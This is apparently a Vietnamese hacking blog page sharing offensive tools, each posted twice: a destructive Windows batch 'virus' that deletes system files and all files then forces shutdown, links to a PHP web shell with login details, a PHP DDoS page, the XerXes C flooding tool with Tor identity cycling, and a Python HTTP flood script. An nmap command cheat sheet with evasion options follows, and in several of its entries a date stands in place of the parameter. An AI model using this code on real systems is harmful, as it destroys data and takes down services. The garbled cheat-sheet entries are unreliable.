Share keepdead đã mod max mạnh :3
Link:http://pastebin.com/vewHfjLL
PHP nhé ai có shell hoặc host thì test liền :3
Monday, March 7, 2016
Sunday, March 6, 2016
Virus phá win
@Echo Off
@cls
@title welcome to nhoit
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
@cls
@title welcome to nhoit
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown Thanks neu cai lai win -s -t 06 -c " Fatal loi #1337, Duck!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit
MadspotV2 shell
MadspotV2 Shell
Link:http://pastebin.com/SR9ctfyR
User:GTP
Pass:GTP
Con shell super chức nawg :V
Link:http://pastebin.com/SR9ctfyR
User:GTP
Pass:GTP
Con shell super chức nawg :V
ddos (php)
<?php
$dominio = $_POST['host'];
$ruta = $_POST['path'];
$port = $_POST['port'];
$poder = $_POST['poder'];
$pw = $_POST['pw'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
<meta name="author" content="Punker2Bot" />
<title>DDOS Attack by HVN™</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
<script type="text/javascript">
function ir_a_bajo(){
var scc = document.getElementById('dinamico');
scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
}
setInterval('ir_a_bajo()',75);
</script>
</head>
<body id="index">
<form action="" method="post" name="jaja">
<table>
<tr>
<td class="titulo">
Domain</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Cổng </td>
<td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Mật khẩu </td>
<td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
</tr>
<tr>
<td>Bạn đã sẵn sàng chưa?</td>
<td><input type="submit" value="DDOS ngay bây giờ!" class="accion"></td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
$msj = array("<h2>Bạn không thể tiếp tục vì nhập sai mật khẩu</h2></div></body></html>","<h2>Hãy điền đúng thông tin về victim trước đã!</h2></div></body></html>","<big><b>Không thể tấn công!!!</b></big><br />n","0a32e26a417d2c7cfbd33","2e2234a41122a233cfbd333b9bc30a03");
function ddoser($dominio,$ruta) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, "80", $errno, $errstr, 30);
// comienzan los datos del header para parecer una persona comun xD
$header = "GET ".$ruta." HTTP/1.1rn";
$header .= "Host: ".$dominio."rn";
$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16rn";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5rn";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3rn";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
$header .= "Keep-Alive: 300rn";
$header .= "*****-Connection: keep-alivern";
$header .= "Referer: http://".$dominio.$ruta."rn";
$header .= "Content-Type: application/x-www-form-urlencodedrn";
$header .= "X-Forwarded-For: ".$ip_simulada."rn";
$header .= "Via: CB-Prxrn";
$header .= "Connection: Closernrn";
//envio todo lo recolectado
$send_header = fwrite($socket,$header);
//lo muestro en la web
if($send_header) {
print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />n");
} else {
print("$msj[2]");
}fclose($socket);
}
if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
if($dominio !== "" && $dominio !== "www.victima.com") {
while(1) {
ddoser($dominio,$ruta);
}
} else { die ("$msj[1]");}
?>
</div>
</body>
</html>
$dominio = $_POST['host'];
$ruta = $_POST['path'];
$port = $_POST['port'];
$poder = $_POST['poder'];
$pw = $_POST['pw'];
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta name="msvalidate.01" content="ECAB4AE09BDECAEDA633439FD8D12D38" />
<meta name="author" content="Punker2Bot" />
<title>DDOS Attack by HVN™</title>
<style>
body { padding: 3px; }
* {
background-color: #1F1F1F;
color: #0EEF57;
font-family: calibri,tahoma,verdana,terminal,serif,lucida,system;
font-size: 18px;
margin: 0; }
input {
width: 440px;
border: solid 1px #00BCFF;
padding: 2px; }
input.accion {
width: 215px;
border: solid 2px #00BCFF;
padding: 3px;
cursor: pointer }
input:hover , input:active { border-color: #FFE900 }
#dinamico {
padding: 3px;
font-size: 13px!important;
height: 300px;
min-height: 300px;
max-height: 300px;
overflow: hidden }
</style>
<script type="text/javascript">
function ir_a_bajo(){
var scc = document.getElementById('dinamico');
scc.scrollTop = scc.scrollHeight + scc.offsetHeight;
}
setInterval('ir_a_bajo()',75);
</script>
</head>
<body id="index">
<form action="" method="post" name="jaja">
<table>
<tr>
<td class="titulo">
Domain</td> <td><input id="boton" type="text" name="host" value="<?php if($dominio=="") { print 'www.victima.com'; } else { print htmlentities($dominio); } ?>" size="40px" ></td>
</tr>
<tr>
<td class="titulo">
Path </td> <td> <input id="boton" type="text" name="path" value="<?php if($ruta=="") { print '/index.php'; } else { print htmlentities($ruta); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Cổng </td>
<td><input id="boton" type="text" disabled name="port" value="<?php if($port=="") { print '80 (disabled)'; } else { print htmlentities($port); } ?>" size="40px" /> </td>
</tr>
<tr>
<td class="titulo">
Mật khẩu </td>
<td><input id="boton" type="text" name="pw" value="<?php if($pw=="") { print 'Password'; } else { print htmlentities($pw); } ?>" size="40px" /> </td>
</tr>
<tr>
<td>Bạn đã sẵn sàng chưa?</td>
<td><input type="submit" value="DDOS ngay bây giờ!" class="accion"></td>
</tr>
</table>
</form>
<br />
<div id="dinamico">
<?php
@set_time_limit(0);
$msj = array("<h2>Bạn không thể tiếp tục vì nhập sai mật khẩu</h2></div></body></html>","<h2>Hãy điền đúng thông tin về victim trước đã!</h2></div></body></html>","<big><b>Không thể tấn công!!!</b></big><br />n","0a32e26a417d2c7cfbd33","2e2234a41122a233cfbd333b9bc30a03");
function ddoser($dominio,$ruta) {
//hago un random de ips para no ser siempre el mismo vistitante
$ip_simulada = rand(188,254).'.'.rand(1,254).'.'.rand(1,254).'.'.rand(1,254);
//defino y abro socket segun los datos del form
$socket = fsockopen($dominio, "80", $errno, $errstr, 30);
// comienzan los datos del header para parecer una persona comun xD
$header = "GET ".$ruta." HTTP/1.1rn";
$header .= "Host: ".$dominio."rn";
$header .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-ES; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16rn";
$header .= "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpg,image/gif,*/*;q=0.5rn";
$header .= "Accept-Language: es-es,es;q=0.8,en-us;q=0.5,en;q=0.3rn";
$header .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7rn";
$header .= "Keep-Alive: 300rn";
$header .= "*****-Connection: keep-alivern";
$header .= "Referer: http://".$dominio.$ruta."rn";
$header .= "Content-Type: application/x-www-form-urlencodedrn";
$header .= "X-Forwarded-For: ".$ip_simulada."rn";
$header .= "Via: CB-Prxrn";
$header .= "Connection: Closernrn";
//envio todo lo recolectado
$send_header = fwrite($socket,$header);
//lo muestro en la web
if($send_header) {
print("Attacking as: <span style='color:#FF0F2F'>".$ip_simulada."</span> @ ".htmlentities(str_replace('www.','',$dominio))."".htmlentities($ruta)."<br />n");
} else {
print("$msj[2]");
}fclose($socket);
}
if($msj[3] !== (md5(md5($pw)))) { die ("$msj[0]");}
if($dominio !== "" && $dominio !== "www.victima.com") {
while(1) {
ddoser($dominio,$ruta);
}
} else { die ("$msj[1]");}
?>
</div>
</body>
</html>
Xerxe.c
/* XerXes - DDos by ./ChmoD Folow Me @ChmoD_Haxor */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}
void broke(int s) {
// do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}
void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}
int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <unistd.h>
#include <netdb.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <arpa/inet.h>
int make_socket(char *host, char *port) {
struct addrinfo hints, *servinfo, *p;
int sock, r;
// fprintf(stderr, "[Connecting -> %s:%s\n", host, port);
memset(&hints, 0, sizeof(hints));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
if((r=getaddrinfo(host, port, &hints, &servinfo))!=0) {
fprintf(stderr, "getaddrinfo: %s\n", gai_strerror(r));
exit(0);
}
for(p = servinfo; p != NULL; p = p->ai_next) {
if((sock = socket(p->ai_family, p->ai_socktype, p->ai_protocol)) == -1) {
continue;
}
if(connect(sock, p->ai_addr, p->ai_addrlen)==-1) {
close(sock);
continue;
}
break;
}
if(p == NULL) {
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "No connection could be made\n");
exit(0);
}
if(servinfo)
freeaddrinfo(servinfo);
fprintf(stderr, "[Connected -> %s:%s]\n", host, port);
return sock;
}
void broke(int s) {
// do nothing
}
#define CONNECTIONS 8
#define THREADS 48
void attack(char *host, char *port, int id) {
int sockets[CONNECTIONS];
int x, g=1, r;
for(x=0; x!= CONNECTIONS; x++)
sockets[x]=0;
signal(SIGPIPE, &broke);
while(1) {
for(x=0; x != CONNECTIONS; x++) {
if(sockets[x] == 0)
sockets[x] = make_socket(host, port);
r=write(sockets[x], "\0", 1);
if(r == -1) {
close(sockets[x]);
sockets[x] = make_socket(host, port);
} else
// fprintf(stderr, "Socket[%i->%i] -> %i\n", x, sockets[x], r);
fprintf(stderr, "[%i: Voly Sent]\n", id);
}
fprintf(stderr, "[%i: Voly Sent]\n", id);
usleep(300000);
}
}
void cycle_identity() {
int r;
int socket = make_socket("localhost", "9050");
write(socket, "AUTHENTICATE \"\"\n", 16);
while(1) {
r=write(socket, "signal NEWNYM\n\x00", 16);
fprintf(stderr, "[%i: cycle_identity -> signal NEWNYM\n", r);
usleep(300000);
}
}
int main(int argc, char **argv) {
int x;
if(argc !=3)
cycle_identity();
for(x=0; x != THREADS; x++) {
if(fork())
attack(argv[1], argv[2], x);
usleep(200000);
}
getc(stdin);
return 0;
}
Nmap Tool All Commands Collection
Nmap Tool All Commands Collection (các lệnh Nmap)
Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum Scan delay —-> nmap –scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]
Maximum scan delay —-> nmap –max-scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every Thursday, October 08, 2015 16:14 UTC+9 [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]
Basic Scanning Techniques
Scan a single target —> nmap [target]
Scan multiple targets —> nmap [target1,target2,etc]
Scan a list of targets —-> nmap -iL [list.txt]
Scan a range of hosts —-> nmap [range of IP addresses]
Scan an entire subnet —-> nmap [IP address/cdir]
Scan random hosts —-> nmap -iR [number]
Excluding targets from a scan —> nmap [targets] –exclude [targets]
Excluding targets using a list —> nmap [targets] –excludefile [list.txt]
Perform an aggressive scan —> nmap -A [target]
Scan an IPv6 target —> nmap -6 [target]
Discovery Options
Perform a ping scan only —> nmap -sP [target]
Don’t ping —> nmap -PN [target]
TCP SYN Ping —> nmap -PS [target]
TCP ACK ping —-> nmap -PA [target]
UDP ping —-> nmap -PU [target]
SCTP Init Ping —> nmap -PY [target]
ICMP echo ping —-> nmap -PE [target]
ICMP Timestamp ping —> nmap -PP [target]
ICMP address mask ping —> nmap -PM [target]
IP protocol ping —-> nmap -PO [target]
ARP ping —> nmap -PR [target]
Traceroute —> nmap –traceroute [target]
Force reverse DNS resolution —> nmap -R [target]
Disable reverse DNS resolution —> nmap -n [target]
Alternative DNS lookup —> nmap –system-dns [target]
Manually specify DNS servers —> nmap –dns-servers [servers] [target]
Create a host list —-> nmap -sL [targets]
Advanced Scanning Options
TCP SYN Scan —> nmap -sS [target]
TCP connect scan —-> nmap -sT [target]
UDP scan —-> nmap -sU [target]
TCP Null scan —-> nmap -sN [target]
TCP Fin scan —> nmap -sF [target]
Xmas scan —-> nmap -sX [target]
TCP ACK scan —> nmap -sA [target]
Custom TCP scan —-> nmap –scanflags [flags] [target]
IP protocol scan —-> nmap -sO [target]
Send Raw Ethernet packets —-> nmap –send-eth [target]
Send IP packets —-> nmap –send-ip [target]
Port Scanning Options
Perform a fast scan —> nmap -F [target]
Scan specific ports —-> nmap -p [ports] [target]
Scan ports by name —-> nmap -p [port name] [target]
Scan ports by protocol —-> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all ports —-> nmap -p “*” [target]
Scan top ports —–> nmap –top-ports [number] [target]
Perform a sequential port scan —-> nmap -r [target]
Version Detection
Operating system detection —-> nmap -O [target]
Submit TCP/IP Fingerprints —-> http://www.nmap.org/submit/
Attempt to guess an unknown —-> nmap -O –osscan-guess [target]
Service version detection —-> nmap -sV [target]
Troubleshooting version scans —-> nmap -sV –version-trace [target]
Perform a RPC scan —-> nmap -sR [target]
Timing Options
Timing Templates —-> nmap -T [0-5] [target]
Set the packet TTL —-> nmap –ttl Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum of parallel connections —-> nmap –min-parallelism [number] [target]
Maximum of parallel connection —-> nmap –max-parallelism [number] [target]
Minimum host group size —–> nmap –min-hostgroup [number] [targets]
Maximum host group size —-> nmap –max-hostgroup [number] [targets]
Maximum RTT timeout —–> nmap –initial-rtt-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]
Initial RTT timeout —-> nmap –max-rtt-timeout [TTL] [target]
Maximum retries —-> nmap –max-retries [number] [target]
Host timeout —-> nmap –host-timeout Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum Scan delay —-> nmap –scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]
Maximum scan delay —-> nmap –max-scan-delay Thursday, October 08, 2015 16:14 UTC+9 [target]
Minimum packet rate —-> nmap –min-rate [number] [target]
Maximum packet rate —-> nmap –max-rate [number] [target]
Defeat reset rate limits —-> nmap –defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets —-> nmap -f [target]
Specify a specific MTU —-> nmap –mtu [MTU] [target]
Use a decoy —-> nmap -D RND: [number] [target]
Idle zombie scan —> nmap -sI [zombie] [target]
Manually specify a source port —-> nmap –source-port [port] [target]
Append random data —-> nmap –data-length [size] [target]
Randomize target scan order —-> nmap –randomize-hosts [target]
Spoof MAC Address —-> nmap –spoof-mac [MAC|0|vendor] [target]
Send bad checksums —-> nmap –badsum [target]
Output Options
Save output to a text file —-> nmap -oN [scan.txt] [target]
Save output to a xml file —> nmap -oX [scan.xml] [target]
Grepable output —-> nmap -oG [scan.txt] [target]
Output all supported file types —-> nmap -oA [path/filename] [target]
Periodically display statistics —-> nmap –stats-every Thursday, October 08, 2015 16:14 UTC+9 [target]
133t output —-> nmap -oS [scan.txt] [target]
Troubleshooting and debugging
Help —> nmap -h
Display Nmap version —-> nmap -V
Verbose output —-> nmap -v [target]
Debugging —-> nmap -d [target]
Display port state reason —-> nmap –reason [target]
Only display open ports —-> nmap –open [target]
Trace packets —> nmap –packet-trace [target]
Display host networking —> nmap –iflist
Specify a network interface —> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts —> nmap –script [script.nse] [target]
Execute multiple scripts —-> nmap –script [expression] [target]
Script categories —-> all, auth, default, discovery, external, intrusive, malware, safe, vuln
Execute scripts by category —-> nmap –script [category] [target]
Execute multiple scripts categories —-> nmap –script [category1,category2, etc]
Troubleshoot scripts —-> nmap –script [script] –script-trace [target]
Update the script database —-> nmap –script-updatedb
Ndiff
Comparison using Ndiff —-> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode —-> ndiff -v [scan1.xml] [scan2.xml]
XML output mode —-> ndiff –xml [scan1.xm] [scan2.xml]
Best lulz ddos (PY)
# Embedded file name: test.py
import urllib, os, threading, time, sys
print '\n ###################################\n'
print ' 80800808.....::DDoS LUlZC::.....808088080\n'
print ' ************************************************'
print
print ' \t lulzc.blogspot.com \n'
if os.name in ('nt', 'dos', 'ce'):
os.system('title ........::::: DDoS LUlZC :::::........')
os.system('color e')
Close = False
Lock = threading.Lock()
Request = 0
Tot_req = 0
class Spammer(threading.Thread):
def __init__(self, url, number):
threading.Thread.__init__(self)
self.url = url
self.num = number
def run(self):
global Lock
global Tot_req
global Close
global Request
Lock.acquire()
print 'Starting thread #{0}'.format(self.num)
Lock.release()
while Close == False:
try:
urllib.urlopen(self.url)
Request += 1
Tot_req += 1
except:
pass
Lock.acquire()
print 'Closing thread #{0}'.format(self.num)
Lock.release()
sys.exit(0)
if __name__ == '__main__':
try:
num_threads = input('> Power(1000): ')
t_tot = input('> Time(2): ')
except:
t_tot = 2
timer = t_tot * 60
t_tot = t_tot * 60
while True:
url = raw_input('> Victim: ')
try:
urllib.urlopen(url)
except IOError:
print 'Could not open specified url.'
else:
break
for i in xrange(num_threads):
Spammer(url, i + 1).start()
time.sleep(2)
print '#######################################################################'
print '\n> Bot Are Loaded Sucessfully.'
print '\n> LUlZC is working hard. . .\n'
while timer > 0:
time.sleep(10)
print '> LUlZC @ ' + str(Request / 10.0) + ' Requests/s\tTotal Request: #' + str(Tot_req) + '\tTime left:', timer, 's'
Request = 0
timer -= 10
print '\n> Average @ ' + str(Tot_req / t_tot) + ' Requests/s'
print '\n#######################################################################\n'
raw_input('> LUlZC is still working, now you can press enter to shutting down threads.')
time.sleep(1)
Close = True
import urllib, os, threading, time, sys
print '\n ###################################\n'
print ' 80800808.....::DDoS LUlZC::.....808088080\n'
print ' ************************************************'
print ' \t lulzc.blogspot.com \n'
if os.name in ('nt', 'dos', 'ce'):
os.system('title ........::::: DDoS LUlZC :::::........')
os.system('color e')
Close = False
Lock = threading.Lock()
Request = 0
Tot_req = 0
class Spammer(threading.Thread):
def __init__(self, url, number):
threading.Thread.__init__(self)
self.url = url
self.num = number
def run(self):
global Lock
global Tot_req
global Close
global Request
Lock.acquire()
print 'Starting thread #{0}'.format(self.num)
Lock.release()
while Close == False:
try:
urllib.urlopen(self.url)
Request += 1
Tot_req += 1
except:
pass
Lock.acquire()
print 'Closing thread #{0}'.format(self.num)
Lock.release()
sys.exit(0)
if __name__ == '__main__':
try:
num_threads = input('> Power(1000): ')
t_tot = input('> Time(2): ')
except:
t_tot = 2
timer = t_tot * 60
t_tot = t_tot * 60
while True:
url = raw_input('> Victim: ')
try:
urllib.urlopen(url)
except IOError:
print 'Could not open specified url.'
else:
break
for i in xrange(num_threads):
Spammer(url, i + 1).start()
time.sleep(2)
print '#######################################################################'
print '\n> Bot Are Loaded Sucessfully.'
print '\n> LUlZC is working hard. . .\n'
while timer > 0:
time.sleep(10)
print '> LUlZC @ ' + str(Request / 10.0) + ' Requests/s\tTotal Request: #' + str(Tot_req) + '\tTime left:', timer, 's'
Request = 0
timer -= 10
print '\n> Average @ ' + str(Tot_req / t_tot) + ' Requests/s'
print '\n#######################################################################\n'
raw_input('> LUlZC is still working, now you can press enter to shutting down threads.')
time.sleep(1)
Close = True
Subscribe to:
Posts (Atom)